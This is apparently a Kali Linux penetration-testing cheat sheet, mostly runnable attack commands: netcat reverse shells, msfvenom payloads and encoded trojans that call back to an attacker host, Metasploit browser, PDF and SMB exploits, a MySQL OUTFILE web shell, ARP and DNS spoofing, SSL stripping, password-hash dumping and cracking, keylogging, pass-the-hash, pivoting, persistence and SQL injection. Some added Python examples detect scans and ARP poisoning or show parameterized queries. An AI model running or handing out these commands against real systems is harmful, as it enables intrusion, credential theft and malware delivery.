Progmar Marcin Załęczny

Networking commands and penetration testing in Kali Linux

Applications to download:

Nessus - security scanner
    http://www.tenable.com/products/nessus-home
Running the application daemon: /etc/init.d/nessusd start
Configuration: https://kali:8834/
After the first start-up it displays an interface for creating a user to log in to the application. Next it displays a form for entering the activation key, which is sent to the e-mail address submitted during the registration process on the vendor's webpage.
Next the application performs its initialization: it downloads the signature database and configures the signatures. This process can take a long time and uses on average 100% of the CPU, so be prepared to wait quite a while.
I started the process in the late evening just before going to sleep, and when I woke up in the morning the application was ready for work.

mingw-w64 - provides compilation of 64-bit Windows programs in a Linux environment:
Make sure that the following repositories are available in the /etc/apt/sources.list config file:
# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
If not, paste them in and install the application with the following commands:
apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64


Tests if the specified port (5500) is open on the remote machine: nc -v 192.168.10.1 5500

Tests whether sending a FIN packet to a closed port does not result in receiving an RST/ACK packet: sudo nmap -sF

Tests whether sending an ACK packet that is not part of an established session does not cause a response: sudo nmap -sA

Tests if the specified UDP port (5500) is open on the remote machine: sudo hping3 -2 -p 5500 192.168.8.100

Tests whether sending an ICMP echo reply for an ICMP echo request that the remote machine never sent does not cause a response: sudo hping3 -1 --icmptype echo-reply 192.168.8.100

Sends one ICMP echo packet to a remote host: ping -c 1 192.168.8.100

Sends an ICMP echo packet with no data after its header to a remote host: sudo nmap -sP 192.168.8.100 or: ping -s 0 192.168.8.100

Broadcast addresses: 224.0.0.0 - 239.255.255.255

TCP connect scan of the specified machine (root privileges are not required): nmap -P0 -sT 192.168.8.100 or: nmap -sT -n 192.168.8.100 --max-rtt-timeout 500ms

TCP SYN scan of the specified machine: sudo nmap -P0 -sS 192.168.8.100 or (without the option specifying the scan type, because TCP SYN scan is the default): sudo nmap -n 192.168.8.100 --max-rtt-timeout 500ms

TCP FIN scan of the specified machine: sudo nmap -P0 -sF 192.168.8.100

TCP XMAS scan of the specified machine: sudo nmap -P0 -sX 192.168.8.100

TCP NULL scan of the specified machine: sudo nmap -P0 -sN 192.168.8.100

TCP ACK scan of the specified machine: sudo nmap -P0 -sA 192.168.8.100

Scans UDP ports of the specified machine: sudo nmap -P0 -sU 192.168.8.100 or: sudo nmap -sU -n 192.168.8.100 --max-rtt-timeout 500ms

Scans the specified network for an open SSH port: sudo nmap -P0 -p 22 -sS 192.168.8.0/24

Detects the version of the service listening on the specified common port (80): sudo nmap -sV -P0 -p 80 -n 192.168.8.100

TCP SYN scan of the specified machine (192.168.8.100) using 10.0.0.1 as the source address and the eth0 interface: sudo nmap -P0 -sS -S 10.0.0.1 -e eth0 192.168.8.100
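
As an added example that is not part of the original page, the following Python snippet classifies the flag combinations that the SYN, FIN, XMAS, NULL and ACK scans above produce and flags a source that sweeps several ports, working over constructed tcpdump-style lines; the capture, the five-port threshold and the function names are assumptions.

```python
"""Classify TCP probes into the nmap scan types listed above and report sources
that sweep many ports.  Added example; the capture below is constructed."""
import re
from collections import defaultdict

# tcpdump writes ACK as '.' and a flagless (NULL-scan) segment as 'none'.
LINE_RE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]*)\]")

# Exact flag sets each scan sends: -sS SYN, -sN nothing, -sF FIN,
# -sX FIN+PSH+URG, -sA ACK.  A SYN/ACK reply ('S.') matches none of them.
SCAN_SIGNATURES = {
    frozenset("S"): "SYN",
    frozenset(): "NULL",
    frozenset("F"): "FIN",
    frozenset("FPU"): "XMAS",
    frozenset("A"): "ACK",
}

def normalise_flags(raw):
    """Turn tcpdump flag text ('S.', 'FPU', 'none') into a set of flag letters."""
    if raw == "none":
        return frozenset()
    return frozenset("A" if ch == "." else ch for ch in raw)

def classify_flags(raw):
    """Return the scan type a flag combination corresponds to, or 'other'."""
    return SCAN_SIGNATURES.get(normalise_flags(raw), "other")

def parse_line(line):
    """Extract (src, dst, dport, scan type) from one tcpdump line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    src, _sport, dst, dport, flags = m.groups()
    return src, dst, int(dport), classify_flags(flags)

def detect_scans(lines, threshold=5):
    """Group probes per (src, dst, scan type) and return alert records.
    FIN, XMAS and NULL segments never occur in a legitimate session, so one is
    enough; lone SYNs/ACKs are normal, so those need `threshold` distinct ports."""
    ports = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[3] == "other":
            continue
        src, dst, dport, scan = rec
        ports[(src, dst, scan)].add(dport)
    alerts = []
    for (src, dst, scan), dports in sorted(ports.items()):
        if scan in ("SYN", "ACK") and len(dports) < threshold:
            continue
        alerts.append({"src": src, "dst": dst, "scan": scan, "ports": len(dports)})
    return alerts

# Constructed sample: 192.168.8.50 runs SYN, XMAS and NULL probes against
# 192.168.8.100, while 192.168.8.20 completes an ordinary handshake to port 80.
SAMPLE_CAPTURE = """\
10:00:01.000000 IP 192.168.8.50.41234 > 192.168.8.100.22: Flags [S], seq 1, win 1024, length 0
10:00:01.000100 IP 192.168.8.50.41234 > 192.168.8.100.80: Flags [S], seq 1, win 1024, length 0
10:00:01.000200 IP 192.168.8.50.41234 > 192.168.8.100.443: Flags [S], seq 1, win 1024, length 0
10:00:01.000300 IP 192.168.8.50.41234 > 192.168.8.100.445: Flags [S], seq 1, win 1024, length 0
10:00:01.000400 IP 192.168.8.50.41234 > 192.168.8.100.3389: Flags [S], seq 1, win 1024, length 0
10:00:02.000000 IP 192.168.8.50.41235 > 192.168.8.100.22: Flags [FPU], seq 1, win 1024, length 0
10:00:02.000100 IP 192.168.8.50.41236 > 192.168.8.100.22: Flags [none], seq 1, win 1024, length 0
10:00:03.000000 IP 192.168.8.20.50001 > 192.168.8.100.80: Flags [S], seq 100, win 64240, length 0
10:00:03.000100 IP 192.168.8.100.80 > 192.168.8.20.50001: Flags [S.], seq 200, ack 101, win 65535, length 0
10:00:03.000200 IP 192.168.8.20.50001 > 192.168.8.100.80: Flags [.], ack 201, win 64240, length 0
"""

if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_CAPTURE.splitlines()):
        print(alert)
```

Feed it `tcpdump -n -l 'tcp[tcpflags] & (tcp-syn|tcp-fin|tcp-push|tcp-urg) != 0 or tcp[tcpflags] == 0'` output line by line to see which hosts on your own segment are probing which ports.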

Runs netcat as a TCP server listening on port 5001. The program waits for data from the network; after receiving it, it dumps the data to standard output and exits: nc -l 5001

Runs netcat as a UDP server listening on port 5002. The program waits for data from the network; after receiving it, it dumps the data to standard output and exits: nc -u -l 5002

Sends the text given after the echo command to the TCP server listening on port 5001 of the specified remote machine, using the nc (netcat) program: echo "To jest napis 12345" | nc 192.168.8.100 5001

Sends 10 bytes of 0xa5 to the UDP server listening on port 5002 of the specified remote machine, using the nc (netcat) program: perl -e 'print "\xa5"x10' | nc -u 192.168.8.100 5002

Restarts the networking service (e.g. after changes made to the /etc/network/interfaces file): service networking restart

Runs netcat in server mode listening on port 1234: nc -lvtp 1234

Sends data to the server listening on port 1234 of the 127.0.0.1 (localhost) machine: nc -vt 127.0.0.1 1234

Runs netcat as a server listening on port 1234. Every incoming line of text is processed by the /bin/sh shell and the result is sent back to the client: nc -lvtp 1234 -e /bin/sh

Runs netcat as a client connecting to the server listening on port 1234 of the local machine and gives the server the ability to execute shell commands on the client and obtain their results: nc -vt 127.0.0.1 1234 -e /bin/sh

Metasploit in Kali 2

Runs postgresql server service: systemctl start postgresql

Initializes database for metasploit: msfdb init

Runs metasploit console: msfconsole

Searches Metasploit's database for the exploit that takes advantage of the vulnerability with the specified code number (ms08-067): msf> search ms08-067

Displays the specified exploit's details: msf> info exploit/windows/smb/ms08_067_netapi

Switches the Metasploit console context to the specified exploit module: msf> use windows/smb/ms08_067_netapi

Displays the options needed to run the selected module/exploit: msf exploit(ms08_067_netapi)> show options

Sets the value of the specified option (here RHOST): msf exploit(ms08_067_netapi)> set RHOST 192.168.10.100

Displays the operating systems that are vulnerable to the selected module/exploit: msf exploit(ms08_067_netapi)> show targets

Sets the target operating system (the number is taken from the list generated by the "show targets" command): msf exploit(ms08_067_netapi)> set target number

Displays the payloads that are compatible with the selected module/exploit: msf exploit(ms08_067_netapi)> show payloads

Runs the selected exploit: exploit

Exits the meterpreter shell that was started after a successful break-in to the victim system: meterpreter> exit

Selects a reverse-shell payload for the module/exploit: msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp

Exits the msfconsole console: msf exploit(ms08_067_netapi)> exit

Program that generates payloads for Metasploit (displays its help): msfvenom -h

Displays the list of available payloads: msfvenom -l payloads

Displays the options available for the selected payload (windows/meterpreter/reverse_tcp): msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Displays the available payload formats: msfvenom --help-formats

Generates the payload.exe executable, which runs a meterpreter shell connecting to the specified host on the specified port: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=443 --platform windows --arch x86 -f exe >payload.exe

Starts the handler for connections coming from victim systems that executed the payload.exe file generated above: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.10.101
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
The last line of the snippet above creates a process listening on port 443.

Uses the auxiliary scanner/smb/pipe_auditor module to display the list of named pipes exposed by the SMB server on the remote machine: msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS 192.168.10.100
msf auxiliary(pipe_auditor)> exploit

Shell command that updates Metasploit's modules/exploits database: msfupdate

Displays all scripts (in the /usr/share/nmap/scripts directory) belonging to the 'default' category: nmap --script-help default

Displays details of the specified script (here nfs-ls): nmap --script-help nfs-ls

Scans the specified host to reveal open ports and runs all scripts belonging to the 'default' category on each port found: nmap -sC 192.168.10.100 or (equivalently): nmap --script=default 192.168.10.100

Scans the specified host to reveal open ports and runs the specified (nfs-ls) script on each port found: nmap --script=nfs-ls 192.168.10.100

Runs the Metasploit console and checks whether an FTP service is listening on the specified hosts (192.168.10.100-192.168.10.110 and 192.168.56.1) and whether it allows anonymous access: msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS 192.168.10.100-110 192.168.56.1
msf> exploit

Checks whether the specified host is vulnerable to the selected exploit without actually running it: msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST 192.168.10.100
msf> check

Checks the website on the specified host for known vulnerabilities: nikto -h 192.168.10.100

Attempts to log in to the WebDAV panel on the specified host using default credentials: cadaver http://192.168.10.100/webdav
Sends the test.txt file to the remote machine: dav:/webdav/> put test.txt

Checks on the mail server whether the specified user exists: nc 192.168.10.100 25
VRFY username
^D

Turns on IP packet forwarding on the current machine (e.g. 192.168.10.101) and poisons the ARP cache of host 192.168.10.100 to make it think that 192.168.10.101 is now 192.168.10.110: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.10.100 192.168.10.110
Now do the same trick for 192.168.10.110 to make it think that 192.168.10.101 is 192.168.10.100 (from now on 192.168.10.101 forwards packets between 192.168.10.100 <=> 192.168.10.110): arpspoof -i eth0 -t 192.168.10.110 192.168.10.100

Resolves the specified domain name to an IP address: nslookup www.google.pl

Poisons DNS with the dnsspoof command, using the mappings in hosts.txt: cat hosts.txt
192.168.10.101 www.google.pl
dnsspoof -i eth1 -f hosts.txt

Captures all network traffic between the 192.168.10.1 gateway and the 192.168.10.110 host: ettercap -Ti eth0 -M arp:remote /192.168.10.1/ /192.168.10.110/
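
The mirror image from the defender's side, as an added example that is not part of the original page: a small monitor over constructed tcpdump-style ARP reply lines that flags the two symptoms the arpspoof and ettercap commands above leave on the wire (an IP answering with a different MAC than before, and one MAC answering for several IPs). The lines, addresses, MACs and class/function names are constructed.

```python
"""Detect ARP cache poisoning of the kind the arpspoof and ettercap commands
above produce.  Added example; the reply lines below are constructed."""
import re
from collections import defaultdict

# tcpdump's one-line form of an ARP reply: "ARP, Reply <ip> is-at <mac>, length 28"
ARP_REPLY_RE = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


class ArpMonitor:
    """Remember the first MAC seen for each IP (as a static ARP table would),
    report replies that contradict it, and report a MAC claiming several IPs."""

    def __init__(self, baseline=None):
        # Optional known-good IP -> MAC bindings, e.g. the gateway's real address.
        self.ip_to_mac = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
        self.claims = defaultdict(set)  # MAC -> set of IPs it has answered for
        for ip, mac in self.ip_to_mac.items():
            self.claims[mac].add(ip)

    def observe(self, ip, mac):
        """Record one reply and return the alerts it triggers (possibly none)."""
        mac = mac.lower()
        alerts = []
        known = self.ip_to_mac.setdefault(ip, mac)
        if known != mac:
            alerts.append(("mac_changed", ip, known, mac))
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            # One station answering for two hosts is exactly what the pair of
            # arpspoof invocations above (one per direction) looks like on the wire.
            alerts.append(("multiple_ips", mac, tuple(sorted(self.claims[mac]))))
        return alerts

    def feed(self, lines):
        """Parse tcpdump-style lines, ignore everything but ARP replies, return alerts."""
        alerts = []
        for line in lines:
            m = ARP_REPLY_RE.search(line)
            if m:
                alerts.extend(self.observe(m.group(1), m.group(2)))
        return alerts


# Constructed capture: .100 and .110 first answer with their own MACs, then the
# station at .101 starts answering for both of them.
SAMPLE_ARP = """\
12:00:00.000000 ARP, Reply 192.168.10.100 is-at aa:aa:aa:aa:aa:00, length 28
12:00:00.100000 ARP, Reply 192.168.10.110 is-at aa:aa:aa:aa:aa:10, length 28
12:00:00.200000 ARP, Reply 192.168.10.101 is-at cc:cc:cc:cc:cc:01, length 28
12:00:05.000000 ARP, Reply 192.168.10.110 is-at cc:cc:cc:cc:cc:01, length 28
12:00:05.000100 ARP, Reply 192.168.10.100 is-at cc:cc:cc:cc:cc:01, length 28
"""


def analyse(lines=None):
    """Run a fresh monitor over the given lines (default: the sample) and return its alerts."""
    if lines is None:
        lines = SAMPLE_ARP.splitlines()
    return ArpMonitor().feed(lines)


if __name__ == "__main__":
    for alert in analyse():
        print(alert)
```

A multi-homed host or a router with secondary addresses also trips multiple_ips, so seed the baseline with the bindings you know are legitimate before acting on the alerts.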

Carrying out an SSL stripping attack:

  1. Run ARP spoofing between the victim host and the default gateway
  2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. Issue the sslstrip command: sslstrip -l 8080

Generates a PHP script that opens a meterpreter shell after a webpage containing the script is visited. The script opens no extra window and connects to the specified host (192.168.56.101) on the specified port number (2323): msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=2323 -f raw >meterpreter.php
Runs the listening process that catches connections from the script described above: msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.101
msf> set LPORT 2323
msf> exploit
After the connection is made we can query the current username: meterpreter> getuid
We can also dump the password hashes of the victim Windows system: meterpreter> hashdump

Makes MySQL write an arbitrary script onto the victim machine: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

Searches Metasploit's module/exploit database for the specified system: msf> search drupal

Obtains information about the specified module/exploit: msf> info unix/webapp/php_xmlrpc_eval

Crawls the specified website (progmar.net.pl) and all linked pages up to 1 level deep for words at least 5 characters long and saves them to the passwords.txt file: cewl -w passwords.txt -d 1 -m 5 progmar.net.pl

Generates a dictionary of 7- and 8-character passwords. Each entry consists of the letters A or B: crunch 7 8 AB

Guesses users and their passwords on the specified POP3 server: hydra -L userlist.txt -P passwords.txt 192.168.56.1 pop3

Guesses the password of user mzaleczny on the specified POP3 server: hydra -l mzaleczny -P passwords.txt 192.168.56.1 pop3

In the Windows operating system the following files exist in the c:\windows\repair directory:
sam - contains encrypted user names and hashes of their passwords
system - contains the system key used to encrypt the data in the file above.
The actual/production versions of the files above sit in the c:\windows\system32\config directory. To extract user names and their password hashes run the following commands: bkhive system xpkey.txt
samdump2 sam xpkey.txt
Save the result of the commands above (or the result of the "meterpreter> hashdump" command described above) to a file "ntpasswords.txt" and issue the following command to guess the passwords: john ntpasswords.txt

The john program can also be used to guess Linux users' passwords: john linux_passwords.txt --wordlist=dictionary.txt

Metasploit's AllPorts payload is used to make a connection on the first port number that is not filtered by a firewall. To do this it tries all ports starting from 1: msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit

The Aurora exploit uses an IE vulnerability to make a connection with a remote system and gain access to the system shell: msf> use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST 192.168.1.101
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST 192.168.1.101
msf exploit(ms10_002_aurora)> exploit
Now when the victim visits the http://192.168.1.101/aurora address in his IE browser, the exploit fires and the attacker who owns the 192.168.1.101 host gains access to the victim's OS shell.

Connects to the specified session: msf exploit(ms10_002_aurora)> sessions -i SESSION_ID

Displays the jobs running in the background in Metasploit's console: msf exploit(ms10_002_aurora)> jobs

Kills the job with the specified ID in Metasploit's console: msf exploit(ms10_002_aurora)> kill JOB_ID

Displays the advanced parameters of the selected module/exploit: msf exploit(ms10_002_aurora)> show advanced

Makes the migrate.rb script (with the -f parameter) run automatically after a successful connection with the victim host. It moves the Meterpreter shell into a newly started notepad process on the host (thanks to this we do not lose the connection when the hung IE is closed): msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
msf exploit(ms10_002_aurora)> exploit
Alternatively we can set the advanced parameter "PrependMigrate" to true. It migrates the shell into a newly created process even before the exploit fires.

Prepares a malicious PDF and listens for callback connections: msf> use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2
Catches connections from victim hosts: msf exploit(adobe_utilprintf)> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set ExitOnSession false
We run our handler as a background job: msf exploit(handler)> exploit -j

Exploit for a web browser with Java < 7 Update 11: msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> exploit

Applet exploit for a web browser with Java: msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST 192.168.1.101
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST 192.168.1.101
msf exploit(java_signed_applet)> exploit

Module that recognizes the web browser and applies all available exploits that might be successful: msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)> set LHOST 192.168.1.101
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploit
Displays all sessions with an active shell running on victim computers: msf auxiliary(browser_autopwn)> sessions -l

Program for carrying out social engineering attacks (sending malicious code in e-mail attachments, creating phishing webpages, etc.; it is installed in Kali Linux by default): setoolkit

In Kali Linux the /usr/share/windows-binaries directory stores a few executables that can be used to carry malicious payloads (any other Windows exe binary may also be used). Here is how to prepare a trojan: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
The process listening for incoming connections from meterpreter shells is run in the Metasploit console using the handler module: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit

Works as the command above but additionally runs 10 iterations of payload encoding with the x86/shikata_ga_nai encoder: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe

Displays the list of encoders supported by the msfvenom program: msfvenom -l encoders

Encodes a payload multiple times with several different encoders: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin

Generates a payload as a C string: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f c >radmin.c

Generates a random text string of length 512: cat /dev/urandom | tr -dc A-Za-z0-9 | head -c512

Encrypts the input.exe executable with the hyperion.exe program and saves it as the output.exe executable: wine hyperion.exe input.exe output.exe

Installs and runs a tftpd server in Kali Linux: apt-get install atftpd
systemctl start atftpd
Downloads the plik.txt file from the remote server to a Windows machine running the cmd shell: tftp -i 192.168.1.101 GET plik.txt
Uploads the plik.txt file from a Windows machine running the cmd shell to the remote server: tftp -i 192.168.1.101 PUT plik.txt

Meterpreter scripts reside in the /usr/share/metasploit-framework/scripts/meterpreter directory. To run a script issue the following command: meterpreter> run script-name
Help for a script can be obtained as below: meterpreter> run script-name -h

Displays the list of running processes: meterpreter> ps

Migrates the meterpreter session into the process with id 1234: meterpreter> run migrate -p 1234

Moves the meterpreter session to the background: meterpreter> background

Obtains the list of users logged on to the system of the specified session: msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit

Calls an arbitrary WinAPI function, for example to check whether the current user is an admin: msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAnAdmin
>> exit

Runs a set of built-in privilege escalation techniques until SYSTEM privileges are obtained or the techniques are exhausted: meterpreter> getsystem
meterpreter> getuid

Returns to the previous user's privileges: meterpreter> rev2self

Runs the exploit for Windows XP SP2/SP3 to elevate user privileges: msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST 192.168.1.101
msf exploit(ms11_080_afdjoinleaf)> exploit

Bypasses UAC (User Account Control) in Windows 7: msf> use exploit/windows/local/bypassuac
msf exploit(bypassuac)> set SESSION 1
msf exploit(bypassuac)> exploit
meterpreter> getuid
The commands above open a meterpreter session with UAC bypassed, so the command below should work properly: meterpreter> getsystem

Enters a Linux shell within the meterpreter session (of course the compromised machine should be running Linux): meterpreter> shell
And issues some basic commands: > whoami
> uname -a
> lsb_release -a
> udevadm --version

Searches the local exploit database for the udev program: /usr/share/exploitdb/searchsploit udev

Runs nc as a server listening on port 12345: nc -lvp 12345
Connects to the netcat instance above and attaches a shell as the program handling its standard input: nc 127.0.0.1 12345 -e /bin/bash
From now on, within the first of the two commands above, you can issue Linux shell commands that will be executed remotely.

Searches for files whose names contain the phrase "password" from within a meterpreter session: meterpreter> search -f password

Runs the key-logger embedded in meterpreter: meterpreter> keyscan_start
Displays the captured keypresses: meterpreter> keyscan_dump
Stops the key-logger: meterpreter> keyscan_stop

Captures passwords stored by the WinSCP application on a Windows system: msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit

Displays the list of users on a Windows system: cmd c:\> net users

Displays the list of local admins on a Windows system: cmd c:\> net localgroup Administrators

After compromising one Windows host you can try to compromise other hosts in the domain using the psexec exploit: msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST 192.168.1.102
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit

Uses the psexec module/exploit to log in to a remote host knowing only the hash of the real password: msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit

Runs the sshexec module/exploit to log in to a remote Linux host: msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST 192.168.1.102
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST 192.168.1.101
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami

Loads the incognito module to handle tokens on a Windows system: msf> load incognito
Lists the available tokens in the meterpreter shell: meterpreter> list_tokens -u
Obtains the specified user's privileges (associated with the given 'COMPXP\\username' token): meterpreter> impersonate_token COMPXP\\username

Starts an SMB server in a Windows domain environment that listens on port 445 and saves user password hashes to the /root/johnpwfile file: msf> use auxiliary/server/capture/smb
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploit
Next you can initiate SMB connections to the fake host 192.168.1.100 from within the compromised machine: meterpreter> shell
C:\windows\system32> net use \\192.168.1.100\anything

Displays the network configuration of the host running the meterpreter shell: meterpreter> ifconfig

Routes all network traffic to the 192.168.80.0/24 network through session number 2 (which has a connection to a compromised router in that network) - this is the so-called pivot: msf> route add 192.168.80.0 255.255.255.0 2

Scans ports from within the Metasploit shell: msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOSTS 192.168.1.101
msf auxiliary(tcp)> exploit

Runs a socks4a proxy server in Metasploit: msf> use auxiliary/server/socks4a
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploit
Now in the /etc/proxychains.conf file change the line: socks4 127.0.0.1 9050
to: socks4 127.0.0.1 4040
From now on you can run programs outside Metasploit through the pivot network using the proxychains application, e.g.: root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445

Creates a new user (martin) and adds it to the domain in a domain environment: C:\> net user martin mypassword /add /domain
Adds the user created above to the Administrators group: C:\> net localgroup Administrators martin /add

Creates on the compromised Windows system a VBScript that is executed after each system start and tries to connect to the attacker's host every 10 minutes: meterpreter> run persistence -r 192.168.1.100 -p 12345 -X -i 600

Runs the burpsuite application: Applications -> Web Applications Analysis -> burpsuite
Proxy server configuration in Firefox: Menu Edit -> Preferences -> Advanced. There switch to the "Network" tab and click the "Settings" button. The proxy server configuration window should open.

Example of injecting arbitrary code via variables processed by web applications: http://someapp.pl/login.php?username=' OR '1'='1&password=' OR '1'='1
http://someapp.pl/item.php?id=4 or 1 in (show databases)
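
As an added example that is not part of the original page: the login query behind the login.php URL above, written first the injectable way and then with bound parameters, run against an in-memory SQLite table so you can see why the ' OR '1'='1 value logs in without a valid password in one case and not in the other. The table, credentials and function names are constructed.

```python
"""The login query behind the login.php URL above, written the injectable way
and with bound parameters.  Added example; table and credentials are constructed."""
import sqlite3

INJECTION = "' OR '1'='1"  # the value the URL above passes as username and password


def make_db():
    """In-memory stand-in for the application's user table.  Passwords are kept
    in clear only to keep the example short; a real store holds a password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the SQL text from user input, so quotes in the input rewrite the query.
    With INJECTION in both fields the statement becomes
      SELECT username FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
    and since AND binds tighter than OR the trailing OR '1'='1' makes every row match,
    so the first user (admin) comes back without any valid password."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Sends the query text and the values separately; the input is only ever
    compared as a string value, so its quotes have no syntactic effect."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Return (vulnerable result, parameterized result, parameterized with real creds)."""
    conn = make_db()
    return (login_vulnerable(conn, INJECTION, INJECTION),
            login_parameterized(conn, INJECTION, INJECTION),
            login_parameterized(conn, "admin", "correct-horse-battery"))


if __name__ == "__main__":
    print(demo())  # ('admin', None, 'admin')
```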

Automated extraction of information about a database: sqlmap -u "http://someapp.pl/item.php?id=4" --dump

Attempts to obtain a shell on the host running SQL Server: sqlmap -u "http://someapp.pl/item.aspx?id=4" --os-shell
The method uses the SQL Server xp_cmdshell command.

All Metasploit exploits reside in the following directory: /usr/share/metasploit-framework/modules/exploits